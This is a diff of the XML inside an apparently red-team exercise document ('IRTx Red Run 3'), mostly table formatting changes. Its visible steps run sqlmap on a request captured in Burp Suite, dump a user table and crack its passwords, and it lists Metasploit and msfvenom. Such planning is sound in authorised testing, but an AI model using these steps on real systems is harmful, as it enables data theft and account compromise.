+              <w:t>SQLmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> with an intercepted request saved as a file from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>burpsuite</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sqlmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -r </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>request.file</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2617,16 +2459,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2644,16 +2482,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2671,21 +2505,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1718" w:hRule="atLeast"/>
+          <w:trHeight w:val="1718"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2704,31 +2534,19 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:highlight w:val="none"/>
-                <w:shd w:fill="auto" w:val="clear"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:kern w:val="0"/>
-                <w:shd w:fill="auto" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
               </w:rPr>
               <w:t>Dump the table and attempt to crack/view passwords of user table</w:t>
@@ -2738,80 +2556,28 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
-        <w:bidi w:val="0"/>
-        <w:jc w:val="left"/>
         <w:rPr>
           <w:sz w:val="56"/>
           <w:szCs w:val="56"/>
@@ -2827,21 +2593,12 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:w="9645" w:type="dxa"/>
-        <w:jc w:val="left"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:top w:w="0" w:type="dxa"/>
-          <w:left w:w="108" w:type="dxa"/>
-          <w:bottom w:w="0" w:type="dxa"/>
-          <w:right w:w="108" w:type="dxa"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1523"/>
+        <w:gridCol w:w="1524"/>
         <w:gridCol w:w="499"/>
         <w:gridCol w:w="2290"/>
         <w:gridCol w:w="2290"/>
@@ -2850,22 +2607,18 @@
       </w:tblGrid>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="497" w:hRule="atLeast"/>
+          <w:trHeight w:val="497"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2883,42 +2636,43 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>IRTx Red Run 3</w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>IRTx</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Red Run 3</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2937,15 +2691,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2963,22 +2713,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="417" w:hRule="atLeast"/>
+          <w:trHeight w:val="417"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -2996,42 +2742,43 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Dylan Wondal</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dylan </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Wondal</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3050,15 +2797,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3076,22 +2819,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="411" w:hRule="atLeast"/>
+          <w:trHeight w:val="411"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3109,15 +2848,11 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3135,16 +2870,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3163,15 +2894,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3189,22 +2916,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="411" w:hRule="atLeast"/>
+          <w:trHeight w:val="411"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3222,15 +2945,11 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3248,16 +2967,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3276,47 +2991,73 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Msfvenom, metasploit, burpsuite</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>metasploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>burpsuite</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1834" w:hRule="atLeast"/>
+          <w:trHeight w:val="1834"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1523" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3332,11 +3073,8 @@
           </w:p>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -3355,48 +3093,56 @@
           <w:tcPr>
             <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
